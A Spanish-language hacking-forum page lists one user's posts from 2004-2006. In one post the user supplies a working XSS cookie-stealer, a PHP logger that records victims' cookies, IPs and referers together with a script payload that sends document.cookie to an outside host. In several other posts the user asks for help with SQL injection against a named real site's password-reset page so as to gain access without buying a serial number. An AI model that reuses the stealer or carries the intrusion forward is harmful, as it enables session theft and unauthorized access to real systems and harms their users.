elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Nivel Web / Re: Ayuda sql injection en: 6 Agosto 2006, 23:41 pm
Aver eso ya lo se. pero yo en un principio lo que keria es saber si por ahi podria conseguir algo para seguir investigando o si por ahi no hay nada que hacer y buscar por otro lado
12  Seguridad Informática / Nivel Web / Re: Ayuda sql injection en: 6 Agosto 2006, 23:28 pm
Si hay un formulario para registrarse pero hay que escribir el numero de serie del programa. si tuviera pelas pa comprarmelo pues no habria problema pero no las tengo :(

Si supiera algo de sql... pero lo unico que se es lo tipico de
Código:
SELECT * from users WHERE user=='usuario'
y dudo mucho que sea asi. por eso no sabria que consulta hacer para que me diera un error con alguna informacion comprometida. e leido algunos textos pero me e kedao igual
13  Seguridad Informática / Nivel Web / Re: Problemas con reenvío de cookies.. en XSS vulnerable. en: 6 Agosto 2006, 23:14 pm
Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:

guarda la variable ?c= en el archivo steal.php

Código:
//cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'   <br>
IP: ' .$ip. ' <br>
Date and Time: ' .$date. '   <br>
Referer: '.$referer.' <br><br>');
fclose($fp);
?>

usa el codigo
Código:
<script>window.location=site.com/cookies.php?c='+document.cookie;</script>
14  Seguridad Informática / Nivel Web / Re: Ayuda sql injection en: 6 Agosto 2006, 22:41 pm
El problema es que donde esta el fallo es en la pagina de "olvide mi contraseña" y lo que pide es el usuario y el email y funciona mas o menos asi:

Código:
_forgotten_password.php

if (usuario=="") {		
	die("NO USUARIO");	//Si el usuario esta en blanco error
}

if (email=="") {
	die("NO EMAIL");	//Si el email esta en blanco error
}

if (usuario!=""){

	//Consulta a la base de datos

	If (email==email) {	//Si el email es como el de la bd 

		mail()		//Envia la contraseña o lo q haga
	}
}
Lo que se me ocurrio fue intentar añadirme a la base de datos o engañarla para que me enviara la contraseña de otro usuario poniendo algo como

Código:
' insert into users values('usuario', 'password')
Pero no se si sera posible. esa es mi duda
15  Seguridad Informática / Nivel Web / Ayuda sql injection en: 4 Agosto 2006, 02:40 am
Hola a todos

Llevo un tiempo intentando entrar en la zona de usuarios de una pagina. Mi objetivo seria poder hacerme usuario pero para ello necesito el numero de serie de un programa y no le tengo. El caso es q intente hacer sql injection para ver si podia entrar con el nombre de otro usuario o en el mejor de los casos crearme uno pero la pagina solo muestra:

Código:
ERROR:Internal error

Pero he descubierto en un sitio que poniendo un nombre cualquiera y despues ' al enviar la pagina responde:

Escribiendo:

Código:
usuario' cualquier cosa

Aparece:

Código:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/blitzbasic/domains/blitzbasic.com/public_html/Account/_forgotten_password.php on line 13
ERROR:Username not recognised.

No tengo mucha experiencia en esto pero creo que de ahi podria sacar algun modo de poder entrar a la zona de usuarios pa poder bajarme unas actualizaciones
16  Programación / Ingeniería Inversa / Re: Softice y XP en: 30 Agosto 2004, 09:50 am
Yo me he bajado el Softice 4.2.7 para Windows Nt y me a funcionao en el xp sin ningun parche.

Pongo un link a mi web donde lo podeis descargar:

http://usuarios.lycos.es/ifcaro/modules.php?name=Downloads&d_op=getit&lid=5
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines